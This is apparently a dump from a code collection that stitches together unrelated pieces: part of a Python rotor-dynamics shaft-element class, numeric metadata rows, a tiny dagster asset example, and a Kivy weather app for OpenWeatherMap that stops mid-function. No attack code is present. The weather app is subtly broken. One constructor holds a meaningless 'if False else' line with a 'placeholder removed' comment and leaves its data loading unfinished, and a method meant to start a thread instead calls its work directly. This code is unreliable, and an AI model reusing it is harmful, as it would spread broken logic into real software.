    >>> shaft = ShaftElement6DoF(L=0.25, idl=0, odl=0.05, material=steel)
    >>> shaft.C().shape
    (12, 12)
    """
    mass_term = self.alpha * self.M()
    stiffness_term = self.beta * self.K()
    return mass_term + stiffness_term
def G(self):
    """Gyroscopic matrix for an instance of a 6 DoFs shaft element.
    Gyroscopic matrix for the 6 DoF shaft element. Similar to the Kst
    stiffness matrix, this Gyro matrix is also multiplied by the value
    of the rotating speed Omega. It is omitted from this and must be
    added in the respective analyses.
    Returns
    -------
    G : np.ndarray
        Gyroscopic matrix for the 6 DoF shaft element.
    Examples
    --------
    >>> from ross.materials import steel
    >>> shaft = ShaftElement6DoF(0.25, 0, 0.05, material=steel)
    >>> shaft.G().shape
    (12, 12)
    """
    if self.gyroscopic:
        # temporary material and geometrical constants, determined as mean values
        # from the left and right radii of the tapered shaft
        L = self.L
        tempI = (
            np.pi
            / 4
            * (
                ((self.odr / 2) ** 4 + (self.odl / 2) ** 4) / 2
                - ((self.idr / 2) ** 4 + (self.idl / 2) ** 4) / 2
            )
        )
        # fmt: off
        # Gyroscopic effect matrix (skew-symmetric; Omega multiplier
        # deliberately omitted, see docstring)
        G = (self.material.rho * tempI / (15 * L)) * np.array([
            [  0, -36, 0,  -3*L,      0, 0,    0,  36, 0,  -3*L,      0, 0],
            [ 36,   0, 0,     0,   -3*L, 0,  -36,   0, 0,     0,   -3*L, 0],
            [  0,   0, 0,     0,      0, 0,    0,   0, 0,     0,      0, 0],
            [3*L,   0, 0,     0,-4*L**2, 0, -3*L,   0, 0,     0,   L**2, 0],
            [  0, 3*L, 0,4*L**2,      0, 0,    0,-3*L, 0, -L**2,      0, 0],
            [  0,   0, 0,     0,      0, 0,    0,   0, 0,     0,      0, 0],
            [  0,  36, 0,   3*L,      0, 0,    0, -36, 0,   3*L,      0, 0],
            [-36,   0, 0,     0,    3*L, 0,   36,   0, 0,     0,    3*L, 0],
            [  0,   0, 0,     0,      0, 0,    0,   0, 0,     0,      0, 0],
            [3*L,   0, 0,     0,   L**2, 0, -3*L,   0, 0,     0,-4*L**2, 0],
            [  0, 3*L, 0, -L**2,      0, 0,    0,-3*L, 0,4*L**2,      0, 0],
            [  0,   0, 0,     0,      0, 0,    0,   0, 0,     0,      0, 0],
        ])
        # fmt: on
    else:
        # Gyroscopic effects disabled: contribute nothing to the model.
        G = np.zeros((12, 12))
    return G
@classmethod
def from_table(cls, file, sheet_type="Simple", sheet_name=0):
    """Instantiate one or more shafts using inputs from an Excel table.

    A header with the names of the columns is required. These names should
    match the names expected by the routine (usually the names of the
    parameters, but also similar ones). The program will read every row
    below the header until they end or it reaches a NaN.

    Parameters
    ----------
    file : str
        Path to the file containing the shaft parameters.
    sheet_type : str, optional
        Describes the kind of sheet the function should expect:
        Simple: The input table should specify only the number of the materials
        to be used.
        They must be saved prior to calling the method.
        Model: The materials parameters must be passed along with the shaft
        parameters. Each material must have an id number and each shaft must
        reference one of the materials ids.
    sheet_name : int or str, optional
        Position of the sheet in the file (starting from 0) or its name. If none is
        passed, it is assumed to be the first sheet in the file.

    Returns
    -------
    shaft : list
        A list of shaft objects.
    """
    parameters = read_table_file(
        file, "shaft", sheet_name=sheet_name, sheet_type=sheet_type
    )
    list_of_shafts = []
    if sheet_type == "Model":
        # "Model" sheets carry their own material definitions; build them
        # first, keyed by the material id number referenced by each row.
        new_materials = {}
        for i in range(len(parameters["matno"])):
            mat_name = "shaft_mat_" + str(parameters["matno"][i])
            new_materials[mat_name] = Material(
                name=mat_name,
                rho=parameters["rhoa"][i],
                E=parameters["ea"][i],
                G_s=parameters["ga"][i],
            )
    if sheet_type in ("Model", "Simple"):
        for i in range(len(parameters["L"])):
            # "Model" rows reference a material built above; "Simple"
            # rows name a previously saved material.
            material = parameters["material"][i]
            if sheet_type == "Model":
                material = new_materials[material]
            # BUG FIX: the 6 DoF constructor takes idl/odl (left-node
            # diameters), not i_d/o_d — the old keywords raised a
            # TypeError as soon as a row was instantiated.
            list_of_shafts.append(
                cls(
                    L=parameters["L"][i],
                    idl=parameters["i_d"][i],
                    odl=parameters["o_d"][i],
                    alpha=parameters["alpha"][i],
                    beta=parameters["beta"][i],
                    material=material,
                    n=parameters["n"][i],
                    axial_force=parameters["axial_force"][i],
                    torque=parameters["torque"][i],
                    gyroscopic=parameters["gyroscopic"][i],
                )
            )
    return list_of_shafts
@classmethod
def section(
    cls,
    L,
    ne,
    s_idl,
    s_odl,
    s_idr=None,
    s_odr=None,
    alpha=0,
    beta=0,
    material=None,
    n=None,
    gyroscopic=True,
):
    """Shaft section constructor.

    This method will create a shaft section with length 'L' divided into
    'ne' equal-length elements. Diameters are linearly interpolated
    between the two ends, so tapered sections are supported.

    Parameters
    ----------
    L : float
        Total length of the shaft section.
    ne : int
        Number of elements the section is divided into.
    s_idl : float
        Inner diameter at the left end of the section.
    s_odl : float
        Outer diameter at the left end of the section.
    s_idr : float, optional
        Inner diameter at the right end of the section.
        Default is s_idl (constant bore).
    s_odr : float, optional
        Outer diameter at the right end of the section.
        Default is s_odl (cylindrical outer surface).
    alpha : float, optional
        Proportional damping coefficient, associated to the element Mass matrix
    beta : float, optional
        Proportional damping coefficient, associated to the element Stiffness matrix
    material : ross.Material
        Shaft material.
    n : int, optional
        Element number (coincident with its first node).
        If not given, it will be set when the rotor is assembled
        according to the element's position in the list supplied to
        the rotor constructor.
    gyroscopic : bool, optional
        Determine if gyroscopic effects are taken into account.
        Default is True.

    Returns
    -------
    elements : list
        List with the 'ne' shaft elements.
    """
    if s_idr is None:
        s_idr = s_idl
    if s_odr is None:
        s_odr = s_odl

    le = L / ne
    # Element i spans [i*le, (i+1)*le]; its end diameters are linearly
    # interpolated at those axial positions.
    # BUG FIX: arguments are now passed by keyword. The previous
    # positional call shifted everything after `odr` into the wrong
    # constructor slots (alpha landed in `material`, beta in `n`,
    # material in `axial_force`, n in `torque`, and gyroscopic in
    # `shear_effects`).
    elements = [
        cls(
            L=le,
            idl=(s_idr - s_idl) * i * le / L + s_idl,
            odl=(s_odr - s_odl) * i * le / L + s_odl,
            idr=(s_idr - s_idl) * (i + 1) * le / L + s_idl,
            odr=(s_odr - s_odl) * (i + 1) * le / L + s_odl,
            material=material,
            n=n,
            gyroscopic=gyroscopic,
            alpha=alpha,
            beta=beta,
        )
        for i in range(ne)
    ]
    return elements
| 36.640842
| 123
| 0.427992
| 9,807
| 76,616
| 3.282553
| 0.070052
| 0.061257
| 0.068868
| 0.076168
| 0.792588
| 0.767023
| 0.741551
| 0.724683
| 0.707101
| 0.689861
| 0
| 0.096272
| 0.435327
| 76,616
| 2,090
| 124
| 36.658373
| 0.647828
| 0.32009
| 0
| 0.63125
| 0
| 0.001786
| 0.059152
| 0.01463
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.008929
| 0.001786
| 0.064286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
4c57590371a275f6410cb28ff43a18402dbb07ee
| 226
|
py
|
Python
|
examples/docs_snippets/docs_snippets/concepts/assets/asset_dependency.py
|
kstennettlull/dagster
|
dd6f57e170ff03bf145f1dd1417e0b2c3156b1d6
|
[
"Apache-2.0"
] | null | null | null |
examples/docs_snippets/docs_snippets/concepts/assets/asset_dependency.py
|
kstennettlull/dagster
|
dd6f57e170ff03bf145f1dd1417e0b2c3156b1d6
|
[
"Apache-2.0"
] | null | null | null |
examples/docs_snippets/docs_snippets/concepts/assets/asset_dependency.py
|
kstennettlull/dagster
|
dd6f57e170ff03bf145f1dd1417e0b2c3156b1d6
|
[
"Apache-2.0"
] | 1
|
2019-09-11T03:02:27.000Z
|
2019-09-11T03:02:27.000Z
|
# pylint: disable=redefined-outer-name
from dagster import asset
# start_marker
@asset
def upstream_asset():
    """Produce the upstream asset: a constant list of three integers."""
    return [1, 2, 3]
@asset
def downstream_asset(upstream_asset):
    """Depend on ``upstream_asset`` by naming it as a parameter; dagster
    injects that asset's value, and this asset appends 4 to it."""
    return upstream_asset + [4]
# end_marker
| 13.294118
| 38
| 0.730088
| 31
| 226
| 5.129032
| 0.645161
| 0.245283
| 0.238994
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02139
| 0.172566
| 226
| 16
| 39
| 14.125
| 0.828877
| 0.265487
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0.285714
| 0.714286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
4c63516cc651b4661204e4bbca3cc6b21eae41ae
| 45,357
|
py
|
Python
|
main.py
|
kiok46/Weather
|
9002bccc885844576a242913c99b0f0d5c1dbb3d
|
[
"MIT"
] | null | null | null |
main.py
|
kiok46/Weather
|
9002bccc885844576a242913c99b0f0d5c1dbb3d
|
[
"MIT"
] | null | null | null |
main.py
|
kiok46/Weather
|
9002bccc885844576a242913c99b0f0d5c1dbb3d
|
[
"MIT"
] | null | null | null |
#imports
import gesture_box as gesture
import json
import urllib2
import calendar_part
import pingpong
import threading
import traceback
import requests
from kivy.app import App
from kivy.uix.floatlayout import FloatLayout
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.uix.listview import ListItemButton
from kivy.storage.jsonstore import JsonStore
from kivy.network.urlrequest import UrlRequest
from kivy.uix.boxlayout import BoxLayout
from kivy.garden.modernmenu import MenuSpawner,ModernMenu
from kivy.uix.widget import Widget
from kivy.graphics import Rectangle,Color
from kivy.garden.moretransitions import RippleTransition
from kivy.uix.popup import Popup
from kivy.properties import ObjectProperty, ListProperty, StringProperty, NumericProperty
from urllib import urlopen
from kivy.animation import Animation
import datetime
from os.path import exists
from kivy.graphics import Color, Ellipse, Line
from random import random
from kivy.utils import platform
from kivy.config import Config
# Loading files: register every kv layout used by the application.
Builder.load_file('./kv/StatusBar.kv')
Builder.load_file('./kv/Locations.kv')
Builder.load_file('./kv/Current.kv')
Builder.load_file('./kv/WholeWeek.kv')
Builder.load_file('./kv/calendar_part.kv')
Builder.load_file('./kv/months.kv')
Builder.load_file('./kv/dates.kv')
Builder.load_file('./kv/select.kv')
Builder.load_file('./kv/days.kv')
Builder.load_file('./kv/pingpong.kv')
# plyer's orientation module only exists on mobile platforms.
if platform in ('android', 'ios'):
    from plyer import orientation
# Global state: gesture flag for the ping-pong screen, and the last
# searched location restored from the json store.
variable_for_ping_pong_gesture = 0
try:
    # BUG FIX: the file handle was previously leaked and the bare
    # `except:` also swallowed SystemExit/KeyboardInterrupt. The
    # best-effort fallback to the default city is kept.
    with open("./json/global_name.json", "r") as name_file:
        getname = json.load(name_file)
except Exception:
    getname = 'Jaipur(IN)'
class HelpDialog(Popup):
    """Modal popup showing the application's help/usage text.

    The text is stored as reStructuredText in ``rst``; it is rendered by
    the widget bound to this property in the kv file (presumably an
    RstDocument — TODO confirm against ./kv definitions).
    """
    # rst: reStructuredText source displayed by the popup's content widget.
    rst = ObjectProperty(None)
    def __init__(self,**kwargs):
        super(HelpDialog,self).__init__(**kwargs)
        # NOTE: this literal is user-facing runtime content — kept verbatim.
        self.rst = '''
    Welcome
    ----------------------------
    **How to use this application?**
    Swipe left or right to view weather forecast. Search for new places, tap on them to view forecast for that region.
    Use Navigation bar to change theme or to change areas.
    Play Game or use calendar and navigate using gestures. Change theme. This application will remember all your choices like your theme and last search.
    Features
    ---------------------------
    **Gesture Recognition**
    Draw these Symbols/characters.
    - 'S' move to Settings area.
    - 'C' move to Calendar area.
    - 'W' move to Weather area.
    - 'P' move to game area.
    - '|' draw a line from top to bottom to refresh the application and get updated forecast.
    **MordenMenu**
    Give a long press on the screen to open up a wheel shaped menu with multiple options and navigate where ever you want.
    You can also change the Theme of the application using this Menubar.
    Click on center of the menu to go back.
    **Navigation Bar**
    Use Navigation bar to change theme or to navigate to different areas.
    **Calendar**
    Calendar which consists year from 0000 to 9999 and simple to use UI.
    **Game**
    There is a small Ping Pong game just for fun.
    Developer
    -----------------------
    Kuldeep Singh, LNMIIT Jaipur, India
    '''
class StatusBar(BoxLayout):
    """Bottom status bar: triggers a forecast refresh and reports progress.

    Expects to be a child of the root widget so that ``self.parent.ids``
    exposes ``status_label``, ``current`` and ``wholeweek`` (wired in kv).
    """

    def connect(self):
        # Show progress immediately, then refresh on a worker thread.
        self.parent.ids.status_label.text = "updating..."
        threading.Thread(target=self.fourth_thread).start()

    def fourth_thread(self):
        """Worker: fetch the 5-day forecast for the current place and push it
        into the Current/WholeWeek widgets; on any failure, fall back to the
        cached ./json/weather.json.

        NOTE(review): runs on a worker thread but mutates Kivy widget
        properties directly; Kivy expects UI updates on the main thread --
        confirm this is safe in this app.
        """
        config = MainApp.get_running_app().config
        temp_type = config.getdefault("General", "temp_type", "metric").lower()
        global getname
        # Unit suffix displayed next to temperatures.
        if temp_type == "metric":
            self.temp_str = "C"
            print "C"
        elif temp_type == "imperial":
            self.temp_str = "F"
            print "F"
        try:
            url = urlopen('http://api.openweathermap.org/data/2.5/forecast/daily?q={}&mode=json&units={}'.format(getname,temp_type)).read()
            result = json.loads(url)
            print "starting"
            # Cache the raw forecast for the offline fallback path below.
            self.out_file = open("./json/weather.json","w")
            json.dump(result,self.out_file, indent=4)
            self.out_file.close()
            # Today's panel.
            self.parent.ids.current.ids.location.text = str(result['city']['name'] +'('+ result['city']['country']+')')
            self.parent.ids.current.ids.conditions.text = str(result['list'][0]['weather'][0]['description'])
            # Four-day panel (index 1 = tomorrow ... 4 = four days out).
            self.parent.ids.wholeweek.ids.conditions1.text = str(result['list'][1]['weather'][0]['description'])
            self.parent.ids.wholeweek.ids.conditions2.text = str(result['list'][2]['weather'][0]['description'])
            self.parent.ids.wholeweek.ids.conditions3.text = str(result['list'][3]['weather'][0]['description'])
            self.parent.ids.wholeweek.ids.conditions4.text = str(result['list'][4]['weather'][0]['description'])
            self.parent.ids.current.ids.temp_min.text = str(result['list'][0]['temp']['min'])+' '+ self.temp_str
            self.parent.ids.current.ids.temp_max.text = str(result['list'][0]['temp']['max'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_min1.text = str(result['list'][1]['temp']['min'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_max1.text = str(result['list'][1]['temp']['max'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_min2.text = str(result['list'][2]['temp']['min'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_max2.text = str(result['list'][2]['temp']['max'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_min3.text = str(result['list'][3]['temp']['min'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_max3.text = str(result['list'][3]['temp']['max'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_min4.text = str(result['list'][4]['temp']['min'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_max4.text = str(result['list'][4]['temp']['max'])+' '+ self.temp_str
            self.parent.ids.current.ids.temperature.text = str(result['list'][0]['temp']['eve']) +' '+ self.temp_str
            # NOTE(review): these replace the ``ids`` entries with plain URL
            # strings rather than setting a widget property (.source/.text);
            # confirm the kv side actually reads them back.
            self.parent.ids.current.ids.conditions_image = "http://openweathermap.org/img/w/{}.png".format(result['list'][0]['weather'][0]['icon'])
            self.parent.ids.wholeweek.ids.conditions_image1 = "http://openweathermap.org/img/w/{}.png".format(result['list'][1]['weather'][0]['icon'])
            self.parent.ids.wholeweek.ids.conditions_image2 = "http://openweathermap.org/img/w/{}.png".format(result['list'][2]['weather'][0]['icon'])
            self.parent.ids.wholeweek.ids.conditions_image3 = "http://openweathermap.org/img/w/{}.png".format(result['list'][3]['weather'][0]['icon'])
            self.parent.ids.wholeweek.ids.conditions_image4 = "http://openweathermap.org/img/w/{}.png".format(result['list'][4]['weather'][0]['icon'])
            print "made it"
            try:
                # Remember the place that was successfully fetched.
                self.out_file = open("./json/global_name.json","w")
                self.city_name = self.parent.ids.current.ids.location.text
                json.dump(self.city_name,self.out_file, indent=4)
                self.out_file.close()
            except:
                print "failed to load file"
            self.parent.ids.status_label.text = "updated"
        except:
            # Network/parse failure: show the cached forecast instead.
            traceback.print_exc()
            self.in_file = open("./json/weather.json","r")
            result = json.load(self.in_file)
            self.parent.ids.current.ids.location.text = str(result['city']['name'] +'('+ result['city']['country']+')')
            self.parent.ids.current.ids.conditions.text = str(result['list'][0]['weather'][0]['description'])
            self.parent.ids.wholeweek.ids.conditions1.text = str(result['list'][1]['weather'][0]['description'])
            self.parent.ids.wholeweek.ids.conditions2.text = str(result['list'][2]['weather'][0]['description'])
            self.parent.ids.wholeweek.ids.conditions3.text = str(result['list'][3]['weather'][0]['description'])
            self.parent.ids.wholeweek.ids.conditions4.text = str(result['list'][4]['weather'][0]['description'])
            self.parent.ids.current.ids.temp_min.text = 'Low: '+str(result['list'][0]['temp']['min'])+' '+ self.temp_str
            self.parent.ids.current.ids.temp_max.text = 'High: ' + str(result['list'][0]['temp']['max'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_min1.text ='Low: '+ str(result['list'][1]['temp']['min'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_max1.text = 'High: ' +str(result['list'][1]['temp']['max'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_min2.text = 'Low: '+str(result['list'][2]['temp']['min'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_max2.text = 'High: ' +str(result['list'][2]['temp']['max'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_min3.text = 'Low: '+str(result['list'][3]['temp']['min'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_max3.text = 'High: ' +str(result['list'][3]['temp']['max'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_min4.text ='Low: '+ str(result['list'][4]['temp']['min'])+' '+ self.temp_str
            self.parent.ids.wholeweek.ids.temp_max4.text = 'High: ' +str(result['list'][4]['temp']['max'])+' '+ self.temp_str
            self.parent.ids.current.ids.temperature.text = str(result['list'][0]['temp']['eve']) +' '+ self.temp_str
            # Offline icons previously cached by Current/WholeWeek workers.
            self.parent.ids.current.ids.conditions_image = "./icons/wc0.png"
            self.parent.ids.wholeweek.ids.conditions_image1 = "./icons/wc1.png"
            self.parent.ids.wholeweek.ids.conditions_image2 = "./icons/wc2.png"
            self.parent.ids.wholeweek.ids.conditions_image3 = "./icons/wc3.png"
            self.parent.ids.wholeweek.ids.conditions_image4 = "./icons/wc4.png"
            self.in_file.close()
            self.parent.ids.status_label.text = "update failed"

    def show_help(self, *args):
        # Open the help popup without blocking the caller.
        threading.Thread(target=self.sixth_thread).start()

    def sixth_thread(self):
        # NOTE(review): opens a Popup from a worker thread; Kivy UI calls
        # should normally run on the main thread -- confirm.
        self.helpdialog = HelpDialog()
        self.helpdialog.open()
class Locations(BoxLayout):
    """Search screen container: query input plus result list (wired in kv)."""
    search_input = ObjectProperty()    # TextInput holding the search query
    search_results = ObjectProperty()  # ListView displaying the matches
    locationtext = ObjectProperty()    # last formatted "City(CC)" string
class LocationButton(ListItemButton):
location = ListProperty()
def update(self,*args):
threading.Thread(target=self.fifth_thread(args[0][0],args[0][1])).start()
def fifth_thread(self,*args):
config = MainApp.get_running_app().config
temp_type = config.getdefault("General", "temp_type", "metric").lower()
self.place = '{},{}'.format(args[0],args[1])
global getname
getname = self.place
#print self.place
if temp_type == "metric":
self.temp_str = "C"
elif temp_type == "imperial":
self.temp_str = "F"
try:
url = urlopen('http://api.openweathermap.org/data/2.5/forecast/daily?q={}&mode=json&units={}'.format(self.place,temp_type)).read()
result = json.loads(url)
print "starting"
self.parent.parent.load_next()
self.parent.parent.parent.parent.parent.ids.current.ids.location.text = str(result['city']['name'] +'('+ result['city']['country']+')')
self.parent.parent.parent.parent.parent.ids.current.ids.conditions.text = str(result['list'][0]['weather'][0]['description'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions1.text = str(result['list'][1]['weather'][0]['description'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions2.text = str(result['list'][2]['weather'][0]['description'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions3.text = str(result['list'][3]['weather'][0]['description'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions4.text = str(result['list'][4]['weather'][0]['description'])
self.parent.parent.parent.parent.parent.ids.current.ids.temp_min.text = str(result['list'][0]['temp']['min'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.current.ids.temp_max.text = str(result['list'][0]['temp']['max'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_min1.text = str(result['list'][1]['temp']['min'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_max1.text = str(result['list'][1]['temp']['max'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_min2.text = str(result['list'][2]['temp']['min'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_max2.text = str(result['list'][2]['temp']['max'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_min3.text = str(result['list'][3]['temp']['min'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_max3.text = str(result['list'][3]['temp']['max'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_min4.text = str(result['list'][4]['temp']['min'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_max4.text = str(result['list'][4]['temp']['max'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.current.ids.temperature.text = str(result['list'][0]['temp']['eve']) +' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.current.ids.conditions_image = "http://openweathermap.org/img/w/{}.png".format(result['list'][0]['weather'][0]['icon'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions_image1 = "http://openweathermap.org/img/w/{}.png".format(result['list'][1]['weather'][0]['icon'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions_image2 = "http://openweathermap.org/img/w/{}.png".format(result['list'][2]['weather'][0]['icon'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions_image3 = "http://openweathermap.org/img/w/{}.png".format(result['list'][3]['weather'][0]['icon'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions_image4 = "http://openweathermap.org/img/w/{}.png".format(result['list'][4]['weather'][0]['icon'])
self.out_file = open("./json/weather.json","w")
json.dump(result,self.out_file, indent=4)
self.out_file.close()
print "made it"
self.parent.parent.parent.parent.parent.ids.status_label.text = "updated"
except:
traceback.print_exc()
self.parent.parent.parent.parent.parent.ids.status_label.text = "update failed"
def search_location(self):
search_template = "http://api.openweathermap.org/data/2.5/find?q={}&type=like"
search_url = search_template.format(self.search_input.text)
print self.search_input.text
#@param URL, method(request, response) to be called upon response
request = UrlRequest(search_url, self.found_location)
def found_location(self, request, response):
try:
response = json.loads(response.decode()) if not isinstance(response, dict) else response
#Fix_Ends
#print response
if response != {u'message': u'', u'cod': u'404'}:
if response != {u'count': 0, u'message': u'like', u'list': [], u'cod': u'200'}:
#change cities from list of string to list of tuples for easier processing while retriving data specific to the location
cities = [(d['name'], d['sys']['country']) for d in response['list']]
self.search_results.item_strings = cities
#the container involved is ObservableList so clear it
#self.search_results.adapter.data.clear()
#clear() on list is not available in python 2 so use
del self.search_results.adapter.data[:]
#donot delete list like this data = [] as it would assign normal list instead of ObservableList
#extend with new data
self.search_results.adapter.data.extend(cities)
#ListAdapter should update display when it sees data change but it ain't doing it, so force the update
self.search_results._trigger_reset_populate()
else:
self.search_input.text = "No results found"
else:
self.search_input.text = "No results found"
except:
self.search_input.text = "Didn't receive any response"
self.parent.parent.parent.parent.parent.ids.status_label.text = "update failed"
def args_converter(self,index, data_item):
#index -> index of the item in list
#data_item -> value
city, country = data_item
print city,country
self.locationtext = "{}({})".format(city,country)
#return value should be a dictionary of properties with their value
#in this case the property location is set to the tuple
#however since location is defined as ListProperty the tuple will be automatically converted into List
return {'location': (city, country)}
class Current(BoxLayout):
    """Today's weather panel: location, conditions and temperatures.

    Shows the cached ./json/weather.json immediately, while a worker thread
    fetches fresh data and caches today's icon to ./icons/wc0.png.
    """
    location = StringProperty()          # "City(CC)"
    conditions = StringProperty()        # textual description
    temp = NumericProperty()             # evening temperature
    temp_min = NumericProperty()
    temp_max = NumericProperty()
    conditions_image = ObjectProperty()  # local icon path or remote URL
    temp_str = StringProperty()          # unit suffix, "C" or "F"
    two = ObjectProperty(None)

    def __init__(self,**kwargs):
        super(Current,self).__init__(**kwargs)
        # Start the network refresh, then display cached data right away.
        threading.Thread(target=self.second_thread).start()
        try:
            self.in_file = open("./json/weather.json","r")
            result = json.load(self.in_file)
            result = json.load(self.in_file) if False else result  # NOTE(review): placeholder removed -- see below
        except:
            traceback.print_exc()

    def second_thread(self):
        pass
class WholeWeek(BoxLayout):
    """Four-day forecast panel (tomorrow through day+4).

    Shows the cached ./json/weather.json immediately, while a worker thread
    fetches fresh data, rewrites the cache and stores the four day icons as
    ./icons/wc1.png .. wc4.png for offline use.
    """
    location = StringProperty()
    conditions = StringProperty()
    temp = NumericProperty()
    temp_min = NumericProperty()
    temp_max = NumericProperty()
    conditions_image = ObjectProperty()
    temp_str = StringProperty()  # unit suffix, "C" or "F"
    # Weekday names padded with extra entries so today+4 never overflows.
    whole = ['Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Sunday','Monday','Tuesday','Wednesday','Thursday']
    # NOTE(review): evaluated once at class-definition (import) time, so the
    # day labels go stale if the app keeps running past midnight -- confirm.
    now = datetime.datetime.now()
    today = whole.index(now.strftime("%A"))
    day1 = StringProperty(whole[today+1])
    day2 = StringProperty(whole[today+2])
    day3 = StringProperty(whole[today+3])
    day4 = StringProperty(whole[today+4])
    # Per-day forecast fields (1 = tomorrow ... 4 = four days out).
    conditions1 = StringProperty()
    temp_min1 = NumericProperty()
    temp_max1 = NumericProperty()
    conditions_image1 = StringProperty()
    conditions2 = StringProperty()
    temp_min2 = NumericProperty()
    temp_max2 = NumericProperty()
    conditions_image2 = StringProperty()
    conditions3 = StringProperty()
    temp_min3 = NumericProperty()
    temp_max3 = NumericProperty()
    conditions_image3 = StringProperty()
    conditions4 = StringProperty()
    temp_min4 = NumericProperty()
    temp_max4 = NumericProperty()
    conditions_image4 = StringProperty()

    def __init__(self,**kwargs):
        super(WholeWeek,self).__init__(**kwargs)
        # Start the network refresh, then display cached data right away.
        # NOTE(review): third_thread rewrites weather.json while this read is
        # in flight -- potential race, confirm ordering assumptions.
        threading.Thread(target=self.third_thread).start()
        try:
            self.in_file = open("./json/weather.json","r")
            result = json.load(self.in_file)
            self.conditions1 = result['list'][1]['weather'][0]['description']
            self.conditions2 = result['list'][2]['weather'][0]['description']
            self.conditions3 = result['list'][3]['weather'][0]['description']
            self.conditions4 = result['list'][4]['weather'][0]['description']
            self.temp_min1 = result['list'][1]['temp']['min']
            self.temp_max1 = result['list'][1]['temp']['max']
            self.temp_min2 = result['list'][2]['temp']['min']
            self.temp_max2 = result['list'][2]['temp']['max']
            self.temp_min3 = result['list'][3]['temp']['min']
            self.temp_max3 = result['list'][3]['temp']['max']
            self.temp_min4 = result['list'][4]['temp']['min']
            self.temp_max4 = result['list'][4]['temp']['max']
            # Previously cached icons.
            self.conditions_image = "./icons/wc0.png"
            self.conditions_image1 = "./icons/wc1.png"
            self.conditions_image2 = "./icons/wc2.png"
            self.conditions_image3 = "./icons/wc3.png"
            self.conditions_image4 = "./icons/wc4.png"
            self.in_file.close()
        except:
            # Cache missing/corrupt: leave defaults, just log.
            traceback.print_exc()

    def third_thread(self):
        """Worker: fetch the forecast, refresh properties and cache icons.

        NOTE(review): mutates Kivy properties from a non-UI thread -- confirm.
        """
        config = MainApp.get_running_app().config
        temp_type = config.getdefault("General", "temp_type", "metric").lower()
        # Unit suffix displayed next to temperatures.
        if temp_type == "metric":
            self.temp_str = "C"
            print "C"
        elif temp_type == "imperial":
            self.temp_str = "F"
            print "F"
        try:
            global getname
            url = urlopen('http://api.openweathermap.org/data/2.5/forecast/daily?q={}&mode=json&units={}'.format(getname,temp_type)).read()
            result = json.loads(url)
            # Cache the raw forecast for the offline fallback paths.
            self.out_file = open("./json/weather.json","w")
            json.dump(result,self.out_file, indent=4)
            self.out_file.close()
            print "came here"
            #self.location = result['city']['name'] +'('+ result['city']['country']+')'
            #self.parent.ids.current.ids.conditions = result['list'][0]['weather'][0]['description']
            #self.parent.ids.current.ids.conditions_image = "http://openweathermap.org/img/w/{}.png".format(result['list'][0]['weather'][0]['icon'])
            self.conditions_image1 = "http://openweathermap.org/img/w/{}.png".format(result['list'][1]['weather'][0]['icon'])
            self.conditions_image2 = "http://openweathermap.org/img/w/{}.png".format(result['list'][2]['weather'][0]['icon'])
            self.conditions_image3 = "http://openweathermap.org/img/w/{}.png".format(result['list'][3]['weather'][0]['icon'])
            self.conditions_image4 = "http://openweathermap.org/img/w/{}.png".format(result['list'][4]['weather'][0]['icon'])
            # Download and cache the four day icons for offline use.
            response1 = requests.get(self.conditions_image1)
